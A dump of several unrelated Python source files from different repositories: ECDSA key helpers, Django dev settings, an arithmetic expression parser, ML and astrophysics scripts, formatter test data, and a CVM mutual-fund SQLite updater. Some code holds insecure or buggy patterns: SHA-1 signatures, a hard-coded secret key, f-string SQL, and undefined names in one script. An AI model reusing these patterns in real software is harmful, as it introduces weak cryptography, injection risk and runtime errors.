
    The private half goes to ``<name>.priv`` and the public half to
    ``<name>.pub``.

    :param keypair: a signing key exposing ``to_pem()`` and
        ``get_verifying_key()``
    :param path: destination directory (must already exist)
    :param name: file basename without extension
    :return: None
    """
    priv_path = os.path.join(path, name + ".priv")
    pub_path = os.path.join(path, name + ".pub")
    with open(priv_path, "wb") as handle:
        handle.write(keypair.to_pem())
    with open(pub_path, "wb") as handle:
        handle.write(keypair.get_verifying_key().to_pem())
def load(privkeypem):
    """Load a private signing key from a PEM file on disk.

    :param privkeypem: path to the private key PEM file
    :return: an ``ecdsa.SigningKey``
    """
    with open(privkeypem, "rb") as handle:
        pem_data = handle.read()
    return SigningKey.from_pem(pem_data)
def loadpub(pubkeypem):
    """Load a public key from a PEM file on disk.

    :param pubkeypem: path to the public key PEM file
    :return: an ``ecdsa.VerifyingKey``
    """
    with open(pubkeypem, "rb") as handle:
        pem_data = handle.read()
    return loadpubstr(pem_data)
def loadpubstr(pemstring):
    """
    Load a public key from PEM string
    :param pemstring: PEM-encoded public key data
    :return: an ``ecdsa.VerifyingKey``
    """
    return VerifyingKey.from_pem(pemstring)
def get_pubkey(datafolder):
    """Return the contents of the public identity key PEM file, or ``None``
    when no key has been generated yet.

    :param datafolder: base data directory
    :return: PEM text or ``None``
    """
    pem_path = get_pub_keyfilename(datafolder)
    if not os.path.exists(pem_path):
        return None
    with open(pem_path, "r") as handle:
        return handle.read()
def sign_string(privkey, message):
    """Sign *message* with *privkey* and return the DER signature hex-encoded.

    :param privkey: an ``ecdsa.SigningKey``
    :param message: value to sign (converted with ``str()``)
    :return: hex-encoded DER signature
    """
    # NOTE(review): SHA-1 is weak by modern standards; both sign and verify
    # would need to migrate together to change the hash.
    payload = str(message)
    raw_sig = privkey.sign(payload, hashfunc=hashlib.sha1,
                           sigencode=ecdsautil.sigencode_der)
    return binascii.hexlify(raw_sig)
def verify_string(pubkey, signature, message):
    """Verify a hex-encoded DER *signature* over *message* with *pubkey*.

    :param pubkey: an ``ecdsa.VerifyingKey``
    :param signature: hex-encoded DER signature (as produced by sign_string)
    :param message: value that was signed (converted with ``str()``)
    :return: True when the signature is valid
    """
    payload = str(message)
    raw_sig = binascii.unhexlify(signature)
    return pubkey.verify(raw_sig, payload, hashfunc=hashlib.sha1,
                         sigdecode=ecdsautil.sigdecode_der)
def ecdh(privkey, pubkey):
    """
    Given a loaded private key and a loaded public key, perform an ECDH exchange
    :param privkey: local ``SigningKey``
    :param pubkey: remote ``VerifyingKey``
    :return: the shared secret produced by the exchange
    """
    # NOTE(review): ``ecdsa`` here is the ``ecdsa.ecdsa`` module (see the
    # imports at the top of this file); confirm the installed python-ecdsa
    # version actually exposes an ``ecdh`` callable there — newer releases
    # provide ECDH through the separate ``ecdsa.ecdh`` module instead.
    return ecdsa.ecdh(privkey, pubkey)
| 2.546875 | 3 |
project/project/settings/development.py | cojennin/facet | 25 | 12762493 | <filename>project/project/settings/development.py
"""Development settings for facet project."""
from django.conf import settings
from django.test.runner import DiscoverRunner
from django.core.mail.utils import DNS_NAME
from .base import *
##############################################################################
# Core Django stuff
SECRET_KEY = "abcdef"  # fine for local development only; never deploy with this
DEBUG = True

INSTALLED_APPS += [
    'debug_toolbar',
]

# The debug toolbar only renders for requests from these addresses.
INTERNAL_IPS = ["127.0.0.1"]

MIDDLEWARE += [
    'debug_toolbar.middleware.DebugToolbarMiddleware',
]

#######################################
# Email
#
# We don't want to send real email, so just print to the console
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'

# Fix for broken DNS at some wifi hot-spots
DNS_NAME._fqdn = "localhost"

######################################
# Caching --- don't actual cache
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
    }
}

######################################
# Logging & Error Reporting
# Blather on about every little thing that happens. We programmers get lonely.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
        },
    },
    'loggers': {
        # Root logger: everything at DEBUG to the console.
        '': {
            'handlers': ['console'],
            'level': 'DEBUG',
        },
        'factory': {  # FactoryBoy is too chatty!
            'handlers': ['console'],
            'level': 'INFO',
        },
        # SQL query logging; propagate=False keeps it from doubling up
        # through the root logger.
        'django.db.backends': {
            'handlers': ['console'],
            'level': 'DEBUG',
            'propagate': False,
        }
    },
}
######################################
# Testing
#
# We don't want to spray all sorts of factory-made fake media stuff in the media folder
# (it won't hurt things, but will take up space), so let's use the temp directory for that.
class MediaTempTestSuiteRunner(DiscoverRunner):
    """Test runner that points MEDIA_ROOT at /tmp so factory-generated media
    files don't accumulate in the real media folder during tests."""
    def __init__(self, *args, **kwargs):
        settings.MEDIA_ROOT = "/tmp"
        super(MediaTempTestSuiteRunner, self).__init__(*args, **kwargs)


TEST_RUNNER = 'project.settings.development.MediaTempTestSuiteRunner'
| 1.828125 | 2 |
flexasm/Expression.py | camerondm9/flexasm | 0 | 12762494 | import ast
import re
import parsy
# Token regexes. Every pattern also consumes trailing whitespace, so the
# parser never needs a separate skip-spaces step between tokens.
# Reference: optional "identifier." or "." prefix followed by an identifier.
R_REFERENCE = re.compile(r'(?:(?:[^\d\W]\w*)?\.)?[^\d\W]\w*\s*', re.IGNORECASE)
R_SPACE = re.compile(r'\s+', re.IGNORECASE)
# Single- or double-quoted string literal with backslash escapes.
R_STRING = re.compile(r"('[^'\\]*(?:\\.[^'\\]*)*'|\"[^\"\\]*(?:\\.[^\"\\]*)*\")\s*", re.IGNORECASE)
R_OPERATOR_UNARY = re.compile(r'[+\-!~]\s*', re.IGNORECASE)
R_OPERATOR_BINARY = re.compile(r'(\*\*|\<{1,2}|\<=|\>{1,2}|\>=|\.\.|==|!=|\<\>|\/{1,2}|[-+*%&|^])\s*', re.IGNORECASE)
# Integer literal: hex (0x/0h), octal (0o/0q), binary (0b/0y) or decimal
# (optional 0d/0t prefix); underscores separate digit groups.
R_INTEGER = re.compile(r'(0[xh][0-9a-f]+(?:_[0-9a-f]+)*|0[oq][0-7]+(?:_[0-7]+)*|0[by][01]+(?:_[01]+)*|(?:0[dt])?[0-9]+(?:_[0-9]+)*)\s*', re.IGNORECASE)
R_PAREN_OPEN = re.compile(r'\(\s*', re.IGNORECASE)
R_PAREN_CLOSE = re.compile(r'\)\s*', re.IGNORECASE)
# Expression terminators: ';', ',', ')', ']' or end of input.
R_END_ALL = re.compile(r'(?:;|,|\)|\])\s*|$', re.IGNORECASE)
@parsy.generate
def parse_integer():
    """Parse an optional integer literal; return its value or ``None``.

    Prefixes select the base: 0x/0h hex, 0o/0q octal, 0b/0y binary,
    0d/0t explicit decimal; no prefix means decimal. Underscores used as
    digit separators are stripped before conversion.
    """
    num = yield parsy.regex(R_INTEGER).desc('integer').optional()
    if num:
        # Normalise: drop the trailing whitespace the regex consumed and
        # the underscore digit separators, then lowercase the prefix.
        num = num.strip().replace('_', '').lower()
        if num.startswith('0x') or num.startswith('0h'):
            return int(num[2:], 16)
        elif num.startswith('0o') or num.startswith('0q'):
            return int(num[2:], 8)
        elif num.startswith('0b') or num.startswith('0y'):
            return int(num[2:], 2)
        elif num.startswith('0d') or num.startswith('0t'):
            return int(num[2:], 10)
        else:
            return int(num, 10)
    return None
@parsy.generate
def parse_expression():
    """Parse a full expression, honouring operator precedence.

    A flat work stack (``result``) collects operand nodes and
    partially-built operator nodes; whenever a binary operator arrives the
    stack is reduced (shunting-yard style) down to its precedence level.
    '**' skips that reduction, making it right-associative.
    """
    yield parsy.regex(R_SPACE).optional()
    result = []
    while True:
        # Any number of unary prefix operators may precede an operand.
        c = yield parsy.regex(R_OPERATOR_UNARY).desc('unary operator').optional()
        if c:
            c = c.strip()
            result.append(UnaryExpression(c))
            continue
        # Operand: integer, reference, string, or parenthesised expression.
        c = yield parse_integer
        if c is not None:
            result.append(ConstantExpression(c))
        else:
            c = yield parsy.regex(R_REFERENCE).desc('reference').optional()
            if c:
                c = c.strip()
                result.append(ReferenceExpression(c))
            else:
                c = yield parsy.regex(R_STRING).desc('string').optional()
                if c:
                    # literal_eval resolves quoting and escapes safely.
                    c = ast.literal_eval(c)
                    result.append(ConstantExpression(c))
                else:
                    c = yield parsy.regex(R_PAREN_OPEN).desc('expression')
                    if c:
                        c = yield parse_expression
                        result.append(c)
                        yield parsy.regex(R_PAREN_CLOSE).desc('closing )')
        c = yield parsy.regex(R_OPERATOR_BINARY).desc('binary operator').optional()
        if c:
            c = c.strip()
            bin = BinaryExpression(c)
            if c != '**':
                # Left-associative operators fold everything of equal or
                # higher precedence before taking their left operand.
                reduce_expression(result, bin.level())
            bin.A = result.pop()
            result.append(bin)
        else:
            # No operator follows: require a terminator (peeked, not
            # consumed) and stop collecting tokens.
            c = yield parsy.peek(parsy.regex(R_END_ALL).desc('expression'))
            break
    reduce_expression(result)
    return validate_expression(result.pop())
def reduce_expression(ops, level=0):
    """Fold the top of the work stack *ops* into the pending operator nodes.

    The stack alternates operand nodes and partially-built operator nodes.
    Each popped operand is attached as the missing ``B`` slot of a binary
    node (or ``A`` of a unary node) beneath it, stopping at the first node
    whose precedence is below *level*.
    """
    while len(ops) > 1:
        e = ops.pop()
        t = ops[-1]
        if t.level() >= level:
            if isinstance(t, BinaryExpression):
                t.B = e
            else:
                if isinstance(t, UnaryExpression):
                    t.A = e
                else:
                    # Two adjacent operands with no operator between them.
                    raise RuntimeError('Cannot reduce expression stack!')
        else:
            # Below the requested precedence: undo the pop and stop.
            ops.append(e)
            break
def validate_expression(e):
    """Recursively check that *e* is a complete expression tree.

    Raises ``RuntimeError`` when a node (or an operand slot left as
    ``None``) is missing; otherwise returns *e* unchanged.
    """
    if e is None:
        raise RuntimeError('Expected expression!')
    children = ()
    if isinstance(e, BinaryExpression):
        children = (e.A, e.B)
    elif isinstance(e, UnaryExpression):
        children = (e.A,)
    for child in children:
        validate_expression(child)
    return e
class BinaryExpression:
    """Binary operator AST node with operands ``A`` and ``B``.

    ``operations`` maps operator text to ``(precedence, evaluator)``;
    higher precedence binds tighter.

    NOTE(review): R_OPERATOR_BINARY also matches '<', '<=', '>', '>=' and
    '..', which have no entry here, so ``level()`` would raise KeyError for
    them — confirm whether those operators are intentionally unsupported.
    """
    operations = {
        '**': (55, lambda a, b: a ** b),
        '*': (43, lambda a, b: a * b),
        '/': (43, lambda a, b: a / b),
        '//': (43, lambda a, b: a // b),
        '%': (43, lambda a, b: a % b),
        '+': (42, lambda a, b: a + b),
        '-': (42, lambda a, b: a - b),
        '<<': (35, lambda a, b: a << b),
        '>>': (35, lambda a, b: a >> b),
        '==': (20, lambda a, b: a == b and 1 or 0),
        '!=': (20, lambda a, b: a != b and 1 or 0),
        '<>': (20, lambda a, b: a != b and 1 or 0),
        '&': (12, lambda a, b: a & b),
        '^': (11, lambda a, b: a ^ b),
        '|': (10, lambda a, b: a | b),
    }
    def __init__(self, text):
        # Operands are attached later by the parser / reduce step.
        self.text = text
        self.A = None
        self.B = None
    def __repr__(self):
        return '(' + repr(self.A) + str(self.text) + repr(self.B) + ')'
    def level(self):
        # Precedence of this operator (higher binds tighter).
        return BinaryExpression.operations[self.text][0]
    def execute(self, options, labels):
        # Evaluate both operands, then apply the operator.
        a = self.A.execute(options, labels)
        b = self.B.execute(options, labels)
        return BinaryExpression.operations[self.text][1](a, b)
    def reduce(self, options, labels):
        # Constant folding: rebuild the node with reduced operands and, if
        # both ended up constant, evaluate the whole subtree now.
        result = self
        a = self.A.reduce(options, labels)
        b = self.B.reduce(options, labels)
        if a is not self.A or b is not self.B:
            result = BinaryExpression(self.text)
            result.A = a
            result.B = b
        if isinstance(a, ConstantExpression) and isinstance(b, ConstantExpression):
            result = ConstantExpression(result.execute(options, labels))
        return result
class UnaryExpression:
    """Unary prefix operator AST node with a single operand ``A``.

    ``operations`` maps operator text to ``(precedence, evaluator)``.
    """
    operations = {
        '+': (50, lambda a: a),
        '-': (50, lambda a: -a),
        '!': (50, lambda a: 1 - (a and 1 or 0)),
        '~': (50, lambda a: ~a),
    }
    def __init__(self, text):
        # The operand is attached later by the parser / reduce step.
        self.text = text
        self.A = None
    def __repr__(self):
        return str(self.text) + repr(self.A)
    def level(self):
        # All unary operators share precedence 50 (below '**' at 55,
        # above every other binary operator).
        return UnaryExpression.operations[self.text][0]
    def execute(self, options, labels):
        a = self.A.execute(options, labels)
        return UnaryExpression.operations[self.text][1](a)
    def reduce(self, options, labels):
        # Constant folding: evaluate now when the reduced operand is constant.
        result = self
        a = self.A.reduce(options, labels)
        if a is not self.A:
            result = UnaryExpression(self.text)
            result.A = a
        if isinstance(a, ConstantExpression):
            result = ConstantExpression(result.execute(options, labels))
        return result
class ConstantExpression:
    """Leaf AST node holding a literal value."""

    def __init__(self, text):
        self.text = text

    def __repr__(self):
        return 'constant({!r})'.format(self.text)

    def level(self):
        # Literals bind tighter than any operator.
        return 65

    def execute(self, options, labels):
        #TODO: How to encode strings?
        return int(self.text)

    def reduce(self, options, labels):
        # Already constant; nothing to fold.
        return self
class ReferenceExpression:
    """Leaf AST node naming a label, resolved against *labels* at
    execution time."""

    def __init__(self, text):
        self.text = text

    def __repr__(self):
        return 'reference({!r})'.format(self.text)

    def level(self):
        # References bind as tightly as literals.
        return 65

    def execute(self, options, labels):
        return labels[self.text]

    def reduce(self, options, labels):
        # Cannot fold: the label value is only known at execution time.
        return self
| 2.640625 | 3 |
v3/disentangled training/run.py | biboamy/instrument-disentangle | 19 | 12762495 | import datetime,os,torch
from torch.utils.data import Dataset
from loadData import *
from lib import *
from fit import *
from model import *
from skimage.measure import block_reduce
import sys
date = datetime.datetime.now()  # used below to build the dated output folder
os.environ['CUDA_VISIBLE_DEVICES'] = '6' # change
# UnetAE_preRoll
# UnetAE_preIP_preRoll -> only predict instrument at buttom
# UnetAE_preIP_prePP_prePNZ_preRoll -> with pitch as adv training predict zero
# UnetAE_preIP_prePP_prePNN_preRoll -> with pitch as adv training negative loss
# DuoAE_preIP_prePP -> no pianoroll conntected
# DuoAE_preIP_preINZ_prePP_prePNZ -> no pianoroll conntected and adv training predict zero
# DuoAE_preIP_preINN_prePP_prePNN -> no pianoroll conntected and adv training negative loss
# DuoAE_preIP_prePP_preRoll -> pianoroll conntected
# DuoAE_preIP_preINZ_prePP_prePNZ_preRoll -> pianoroll conntected and adv training predict zero
# DuoAE_preIP_preINN_prePP_prePNN_preRoll -> pianoroll conntected and adv training predict negative
def main(args):
    """Train the disentangling model named in ``args[1]`` on the musescore
    data; checkpoints go to ``../data/model/<yyyymmdd>/<name>/``.

    :param args: ``sys.argv``; ``args[1]`` selects the model variant
        (see the list of supported names in the comments above).
    """
    name = args[1]
    batch_size = 10
    epoch = 100
    lr = 0.01
    out_model_fn = '../data/model/%d%d%d/%s/'%(date.year,date.month,date.day,name)
    if not os.path.exists(out_model_fn):
        os.makedirs(out_model_fn)

    # load data
    t_kwargs = {'batch_size': batch_size, 'num_workers': 2, 'pin_memory': True,'drop_last': True}
    Xtr,Ytr,Ytr_p,Ytr_s = load('musescore')
    # Xtr (batch_size, 1, note_bin, time_length)
    # Ytr (batch_size, instrument_categories, time_length)
    # Ytr_p (batch_size, note_bin, time_length)
    # Ytr_s (batch_size, instrument_categories, note_bin, time_length)
    Xtr_mel,Ytr_mel = load_melody('musescore')
    # Pre-computed CQT normalisation statistics.
    avg, std = np.load('../../data/cqt_avg_std.npy')
    trdata = [Xtr, Ytr, Ytr_p, Ytr_s, Xtr_mel, Ytr_mel]
    tr_loader = torch.utils.data.DataLoader(Data2Torch(trdata), shuffle=True, **t_kwargs)
    print('finishing data building...')

    # build model
    model = Net(name).cuda()
    model.apply(model_init)

    # balance data: per-class weights derived from the instrument labels
    weight = [get_weight(Ytr)]

    # start training
    Trer = Trainer(model, lr, epoch, out_model_fn, avg, std)
    Trer.fit(tr_loader, weight, name)
    print( out_model_fn)

if __name__ == "__main__":
    main(sys.argv)
| 2.0625 | 2 |
tests/data/docstring_no_string_normalization.py | AppliedIntuition/black | 28 | 12762496 | class ALonelyClass:
'''
A multiline class docstring.
'''
def AnEquallyLonelyMethod(self):
'''
A multiline method docstring'''
pass
def one_function():
'''This is a docstring with a single line of text.'''
pass
def shockingly_the_quotes_are_normalized():
'''This is a multiline docstring.
This is a multiline docstring.
This is a multiline docstring.
'''
pass
def foo():
"""This is a docstring with
some lines of text here
"""
return
def baz():
'''"This" is a string with some
embedded "quotes"'''
return
def poit():
"""
Lorem ipsum dolor sit amet.
Consectetur adipiscing elit:
- sed do eiusmod tempor incididunt ut labore
- dolore magna aliqua
- enim ad minim veniam
- quis nostrud exercitation ullamco laboris nisi
- aliquip ex ea commodo consequat
"""
pass
def under_indent():
"""
These lines are indented in a way that does not
make sense.
"""
pass
def over_indent():
"""
This has a shallow indent
- But some lines are deeper
- And the closing quote is too deep
"""
pass
def single_line():
"""But with a newline after it!
"""
pass
def this():
r"""
'hey ho'
"""
def that():
""" "hey yah" """
def and_that():
"""
"hey yah" """
def and_this():
'''
"hey yah"'''
def believe_it_or_not_this_is_in_the_py_stdlib(): '''
"hey yah"'''
def shockingly_the_quotes_are_normalized_v2():
'''
Docstring Docstring Docstring
'''
pass
# output
class ALonelyClass:
'''
A multiline class docstring.
'''
def AnEquallyLonelyMethod(self):
'''
A multiline method docstring'''
pass
def one_function():
'''This is a docstring with a single line of text.'''
pass
def shockingly_the_quotes_are_normalized():
'''This is a multiline docstring.
This is a multiline docstring.
This is a multiline docstring.
'''
pass
def foo():
"""This is a docstring with
some lines of text here
"""
return
def baz():
'''"This" is a string with some
embedded "quotes"'''
return
def poit():
"""
Lorem ipsum dolor sit amet.
Consectetur adipiscing elit:
- sed do eiusmod tempor incididunt ut labore
- dolore magna aliqua
- enim ad minim veniam
- quis nostrud exercitation ullamco laboris nisi
- aliquip ex ea commodo consequat
"""
pass
def under_indent():
"""
These lines are indented in a way that does not
make sense.
"""
pass
def over_indent():
"""
This has a shallow indent
- But some lines are deeper
- And the closing quote is too deep
"""
pass
def single_line():
"""But with a newline after it!"""
pass
def this():
r"""
'hey ho'
"""
def that():
""" "hey yah" """
def and_that():
"""
"hey yah" """
def and_this():
'''
"hey yah"'''
def believe_it_or_not_this_is_in_the_py_stdlib():
'''
"hey yah"'''
def shockingly_the_quotes_are_normalized_v2():
'''
Docstring Docstring Docstring
'''
pass
| 3.53125 | 4 |
Applications/ue4/4.20.2/package.py | cashmerepipeline/CashmereRez | 0 | 12762497 | # -*- coding: utf-8 -*-
# Rez package definition for Unreal Engine 4.20.2.
name = 'ue4'
version = '4.20.2'
author = ['ue4']
requires = ["python-2.7.11"]
variants = []

def commands():
    """Executed by rez when this package is resolved into an environment;
    ``env`` is a global injected by rez at that point."""
    import os
    applications_path = os.environ["APPLICATIONS_PATH"]
    # replace('/', os.sep) normalises any forward slashes coming from
    # APPLICATIONS_PATH itself on Windows.
    python_path = os.path.join(applications_path, "python", "2.7.11").replace("/", os.sep)
    ue4_path = os.path.join(applications_path, "ue4", "%s"%version).replace("/", os.sep)
    env.UE_PYTHON_DIR.set(python_path)
    env.PATH.append(os.path.join(ue4_path, "Engine", "Binaries", "Win64").replace("/", os.sep))
| 1.921875 | 2 |
code/oldtmpcodes/get_bias.py | modichirag/21cmhod | 0 | 12762498 | import numpy as np
from pmesh.pm import ParticleMesh
from nbodykit.lab import BigFileCatalog, MultipleSpeciesCatalog,\
BigFileMesh, FFTPower
from nbodykit import setup_logging
from mpi4py import MPI
import HImodels
# enable logging, we have some clue what's going on.
setup_logging('info')
#
#Global, fixed things
# NERSC scratch/project paths holding the simulation outputs.
scratchyf = '/global/cscratch1/sd/yfeng1/m3127/'
scratchcm = '/global/cscratch1/sd/chmodi/m3127/H1mass/'
project = '/project/projectdirs/m3127/H1mass/'
cosmodef = {'omegam':0.309167, 'h':0.677, 'omegab':0.048}
# Scale factors to process (a = 1/(1+z)).
alist = [0.1429,0.1538,0.1667,0.1818,0.2000,0.2222,0.2500,0.2857,0.3333]

#Parameters, box size, number of mesh cells, simulation, ...
bs, nc, ncsim, sim, prefix = 256, 512, 2560, 'highres/%d-9100-fixed'%2560, 'highres'
#bs,nc,ncsim, sim, prefic = 1024, 1024, 10240, 'highres/%d-9100-fixed'%ncsim, 'highres'

# It's useful to have my rank for printing...
pm = ParticleMesh(BoxSize=bs, Nmesh=[nc, nc, nc])
rank = pm.comm.rank
comm = pm.comm

#Which model to use
HImodel = HImodels.ModelA
ofolder = '../data/outputs/'
def calc_bias(aa,h1mesh,suff):
    '''Compute the bias(es) for the HI at scale factor *aa*.

    Returns (k, b1_cross, b1_auto, |P_mm|): the cross bias P_hm/P_mm and
    the auto bias sqrt(P_hh/P_mm), measured against the dark-matter mesh.
    '''
    if rank==0:
        print("Processing a={:.4f}...".format(aa))
        print('Reading DM mesh...')
    # The mesh path layout differs between the two simulation resolutions.
    if ncsim == 10240:
        dm = BigFileMesh(scratchyf+sim+'/fastpm_%0.4f/'%aa+\
                        '/1-mesh/N%04d'%nc,'').paint()
    else:
        dm = BigFileMesh(project+sim+'/fastpm_%0.4f/'%aa+\
                        '/dmesh_N%04d/1/'%nc,'').paint()
    # Normalise to overdensity (mean 1).
    dm /= dm.cmean()
    if rank==0: print('Computing DM P(k)...')
    pkmm = FFTPower(dm,mode='1d').power
    k,pkmm= pkmm['k'],pkmm['power'] # Ignore shotnoise.
    if rank==0: print('Done.')
    #
    pkh1h1 = FFTPower(h1mesh,mode='1d').power
    pkh1h1 = pkh1h1['power']-pkh1h1.attrs['shotnoise']
    pkh1mm = FFTPower(h1mesh,second=dm,mode='1d').power['power']
    if rank==0: print('Done.')
    # Compute the biases: the 1e-10 floor guards against division by zero.
    b1x = np.abs(pkh1mm/(pkmm+1e-10))
    b1a = np.abs(pkh1h1/(pkmm+1e-10))**0.5
    if rank==0: print("Finishing processing a={:.4f}.".format(aa))
    return(k,b1x,b1a,np.abs(pkmm))
#
if __name__=="__main__":
    #satsuff='-m1_5p0min-alpha_0p8-16node'
    suff='-m1_00p3mh-alpha-0p8-subvol'
    outfolder = ofolder + suff[1:] + "/modelA/"
    # NOTE(review): ``os`` is never imported in this script, so os.makedirs
    # raises NameError here — and the bare ``except`` silently swallows it,
    # meaning the output folder is never created. Import os and narrow the
    # except clause to OSError.
    try: os.makedirs(outfolder)
    except : pass
    if rank==0:
        print('Starting')
    for aa in alist:
        if rank == 0: print('\n ############## Redshift = %0.2f ############## \n'%(1/aa-1))
        halocat = BigFileCatalog(scratchyf + sim+ '/fastpm_%0.4f//'%aa, dataset='LL-0.200')
        # Halo mass from particle count times particle mass (1e10 Msun/h units).
        mp = halocat.attrs['MassTable'][1]*1e10##
        halocat['Mass'] = halocat['Length'].compute() * mp
        cencat = BigFileCatalog(scratchcm + sim+'/fastpm_%0.4f/cencat'%aa+suff)
        satcat = BigFileCatalog(scratchcm + sim+'/fastpm_%0.4f/satcat'%aa+suff)
        # NOTE(review): ``read_conversions`` is neither defined nor imported
        # in this module — confirm which module it should come from.
        rsdfac = read_conversions(scratchyf + sim+'/fastpm_%0.4f/'%aa)
        #
        HImodelz = HImodel(aa)
        los = [0,0,1]
        halocat['HImass'], cencat['HImass'], satcat['HImass'] = HImodelz.assignHI(halocat, cencat, satcat)
        halocat['RSDpos'], cencat['RSDpos'], satcat['RSDpos'] = HImodelz.assignrsd(rsdfac, halocat, cencat, satcat, los=los)
        h1mesh = HImodelz.createmesh(bs, nc, halocat, cencat, satcat, mode='galaxies', position='RSDpos', weight='HImass')
        kk,b1x,b1a,pkmm = calc_bias(aa,h1mesh,suff)
        #
        if rank==0:
            fout = open(outfolder + "HI_bias_{:6.4f}.txt".format(aa),"w")
            # NOTE(review): ``mcut`` is undefined here (NameError on rank 0);
            # it was presumably meant to be a mass cut computed above.
            fout.write("# Mcut={:12.4e}Msun/h.\n".format(mcut))
            fout.write("# {:>8s} {:>10s} {:>10s} {:>15s}\n".\
                       format("k","b1_x","b1_a","Pkmm"))
            for i in range(1,kk.size):
                fout.write("{:10.5f} {:10.5f} {:10.5f} {:15.5e}\n".\
                           format(kk[i],b1x[i],b1a[i],pkmm[i]))
            fout.close()
        #
| 1.742188 | 2 |
update_db.py | dss-Diego/br_mfunds | 2 | 12762499 | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 2 19:15:26 2020
@author: Diego
"""
import pandas as pd
import sqlite3
import wget
import os
from urllib.request import urlopen
from bs4 import BeautifulSoup
import urllib.request
import datetime
import zipfile
import io
import requests
# Ensure the data/ and data/temp/ working directories exist.
if not os.path.exists('data'):
    os.makedirs('data')
if not os.path.exists(os.path.join('data', 'temp')):
    os.makedirs(os.path.join('data', 'temp'))

# Module-level connection and cursor shared by every function below.
conn = sqlite3.connect(os.path.join('data', 'fundos.db'))
db = conn.cursor()
# %% functions
def create_tables():
    """
    Creates all tables (and the quotas index) in the database.

    Every statement is idempotent (``IF NOT EXISTS``), so this function is
    safe to call on every startup, not only on the very first run.

    Returns
    -------
    None.

    """
    db.execute("""CREATE TABLE IF NOT EXISTS files
               (file_name TEXT,
                last_modified DATE)""")
    db.execute("""CREATE TABLE IF NOT EXISTS quotas
               (cnpj TEXT,
                date DATE,
                quota REAL)""")
    # Bug fix: without IF NOT EXISTS this raised sqlite3.OperationalError on
    # any run after the first, because the index already existed.
    db.execute("CREATE INDEX IF NOT EXISTS idx_quotas_cnpj ON quotas(cnpj);")
    db.execute("""CREATE TABLE IF NOT EXISTS inf_cadastral
               (cnpj TEXT,
                denom_social TEXT,
                classe text,
                rentab_fundo TEXT,
                taxa_perfm INTEGER,
                taxa_adm REAL)""")
    db.execute("""CREATE TABLE IF NOT EXISTS cdi
               (date DATE,
                cdi REAL,
                d_factor REAL)""")
def update_register():
    """
    Updates the mutual funds register (table ``inf_cadastral``) from the
    most recently modified file published by CVM, keeping only active,
    open funds with non-zero equity.

    Returns
    -------
    None.

    """
    url = 'http://dados.cvm.gov.br/dados/FI/CAD/DADOS/'
    files = {}
    i = 0
    # Scrape the directory listing for register files and their timestamps.
    html = urlopen(url)
    soup = BeautifulSoup(html, 'lxml')
    table = soup.find('table')
    tr = table.find_all('tr')
    for t in tr:
        if t.text[0:17] == 'inf_cadastral_fi_':
            file_name = t.text[0:29]
            last_modified = pd.to_datetime(t.text[29:45])
            files[i] = {'file_name': file_name, 'url_date': last_modified}
            i += 1
    available_files = pd.DataFrame.from_dict(files, orient='index')
    available_files['url_date'] = pd.to_datetime(available_files['url_date'])
    # The most recently modified register file wins.
    last_file = available_files['file_name'][available_files['url_date'] == max(available_files['url_date'])].values[0]
    file_url = f"http://dados.cvm.gov.br/dados/FI/CAD/DADOS/{last_file}"
    response = requests.get(file_url)
    df = pd.read_csv(io.BytesIO(response.content), sep=';', header=0, encoding='latin-1')
    df.columns = df.columns.str.lower()
    df = df.rename(columns={'cnpj_fundo': 'cnpj'})
    # drop inactive
    df = df[df['sit'] == 'EM FUNCIONAMENTO NORMAL']
    # drop closed
    df = df[df['condom'] == 'Aberto']
    # drop no equity
    df = df[df['vl_patrim_liq'] != 0]
    df = df.drop_duplicates(subset=['cnpj'], keep='last')
    df = df[['cnpj', 'denom_social', 'classe', 'rentab_fundo', 'taxa_perfm', 'taxa_adm']]
    df[['taxa_perfm', 'taxa_adm']] = df[['taxa_perfm', 'taxa_adm']].fillna(value=0)
    # Full refresh: the register is small, so replace it wholesale.
    db.execute("DELETE FROM inf_cadastral")
    df.to_sql('inf_cadastral', conn, if_exists='append', index=False)
    conn.commit()
    return
def update_quotes():
    """
    Updates the mutual funds quotes.

    Downloads every CVM daily-quote file (historic yearly zips plus the
    current monthly csvs) that is new or changed since the last run, as
    tracked in the ``files`` table.

    Returns
    -------
    None.

    """
    db_files = pd.read_sql("SELECT * FROM files", conn)
    urls = ['http://dados.cvm.gov.br/dados/FI/DOC/INF_DIARIO/DADOS/HIST/',
            'http://dados.cvm.gov.br/dados/FI/DOC/INF_DIARIO/DADOS/']
    files = {}
    i = 0
    # Scrape both directory listings for quote files and their timestamps.
    for url in urls:
        html = urlopen(url)
        soup = BeautifulSoup(html, 'lxml')
        table = soup.find('table')
        tr = table.find_all('tr')
        for t in tr:
            if t.text[0:14] == 'inf_diario_fi_':
                # Current monthly csvs have longer names (YYYYMM.csv) than
                # the yearly zips in the HIST folder (YYYY.zip).
                if url == 'http://dados.cvm.gov.br/dados/FI/DOC/INF_DIARIO/DADOS/':
                    file_name = t.text[0:24]
                    last_modified = pd.to_datetime(t.text[24:40]).date()
                else:
                    file_name = t.text[0:22]
                    last_modified = pd.to_datetime(t.text[22:38]).date()
                files[i] = {'file_name': file_name, 'url_date': last_modified}
                i += 1
    available_files = pd.DataFrame.from_dict(files, orient='index')
    # Keep only files newer than what has already been processed.
    new_files = available_files.merge(db_files, how='left', right_on='file_name', left_on='file_name')
    new_files = new_files.fillna(pd.to_datetime('1900-01-01'))
    new_files = new_files[new_files['url_date'] > pd.to_datetime(new_files['last_modified'])]
    for idx, file in new_files.iterrows():
        # 22-character names come from the HIST folder and are zipped.
        if len(file['file_name']) == 22:
            url = 'http://dados.cvm.gov.br/dados/FI/DOC/INF_DIARIO/DADOS/HIST/'
            zip_or_csv = 'zip'
        else:
            url = 'http://dados.cvm.gov.br/dados/FI/DOC/INF_DIARIO/DADOS/'
            zip_or_csv = 'csv'
        file_url = url + file['file_name']
        file_data = requests.get(file_url).content
        # Re-register the file with its new timestamp after a clean load.
        db.execute(f"""DELETE FROM files
                   WHERE file_name = '{file['file_name']}'""")
        load_file(file_data, zip_or_csv=zip_or_csv)
        db.execute(f"""INSERT INTO files
                   VALUES ('{file['file_name']}', '{file['url_date']}')""")
        print(f"{file['file_name']} downloaded successfully.")
    conn.commit()
    return
def load_file(file_data, zip_or_csv):
    """
